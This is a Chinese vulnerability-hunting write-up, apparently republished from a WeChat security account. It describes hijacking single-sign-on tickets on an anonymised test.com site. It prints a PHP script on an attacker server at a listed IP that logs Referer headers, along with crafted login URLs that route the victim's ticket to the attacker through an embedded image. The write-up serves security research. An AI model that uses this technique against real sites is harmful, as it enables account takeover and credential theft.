实战 | 漏洞挖掘之众测厂商 Ticket劫持漏洞
2023-2-9 16:28:22 Author: 寰宇卫士(查看原文) 阅读量:13 收藏

0x00 前言

文章中的项目地址统一修改为: test.com 保护厂商也保护自己

0x01 前期准备

受害者账号: 18******977
攻击者账号: tsetaaaa
攻击者服务器:123.207.33.78
攻击文件:img_referer.php
访问 url:http://123.207.33.78/img_referer.php
攻击代码:
<?php
if ($_SERVER['HTTP_REFERER']) {
file_put_contents('./img_referer.txt', $_SERVER['HTTP_REFERER'].PHP_EOL, FILE_APPEND);
}

0x02 场景

绕不过 service 字段的白名单验证所以换了此方法进行绕过获取

白名单触发:http://yun.test.com/index.php?r=portal/user/login&service=http://baidu.com


白名单通过:http://yun.test.com/index.php?r=portal/user/login&service=http://xxxxxxxxxxx.test.com/


名单做的比较死只允许 *.test.com 跳转进行登录
思考了一下可以找一处可以显示插入图片的地方,利用图片来绕过获取到 ticket

0x03 攻击开始

0x03.1 登录攻击者账号准备攻击

攻击者空间装扮 url: http://yun.test.com/index.php?r=space/person/show&sid=4c7ccfb4c0b6418b83991a57ccb7175f


攻击者 url: http://yun.test.com/index.php?r=portal/user/login&service=http%3A%2F%2Fyun.test.com%2Findex.php%3Fr%3Dspace%2Fperson%2Fshow%26sid%3D4c7ccfb4c0b6418b83991a57ccb7175f

0x3.2 受害者上线

受害者记得要登录

受害者打开 url: http://yun.test.com/index.php?r=portal/user/login&service=http%3A%2F%2Fyun.test.com%2Findex.php%3Fr%3Dspace%2Fperson%2Fshow%26sid%3D4c7ccfb4c0b6418b83991a57ccb7175f


原文来自「HACK学习呀」|侵删

中电运行是专业专注培养能源企业IT工匠和提供IT整体解决方案的服务商,也是能源互联网安全专家。我们每天都会分享各种IT相关内容,如果您有任何关于IT疑问,欢迎给我们留言

小白必读!寰宇卫士手把手教你栈溢出(上)

手把手教你栈溢出(中)

手把手教你栈溢出(下)

《信息安全知识》之法律关键常识汇总

CTF经验分享|带你入门带你飞!


文章来源: http://mp.weixin.qq.com/s?__biz=MzIwMzU0NDY5OA==&mid=2247496311&idx=1&sn=8fb9d262f20211c76ee5db1890548bcf&chksm=96cf7362a1b8fa749ccb4e1b5005ef63480ee091057fc183cf3c1466686d8bd5f5c921bbeec6#rd
如有侵权请联系:admin#unsafe.sh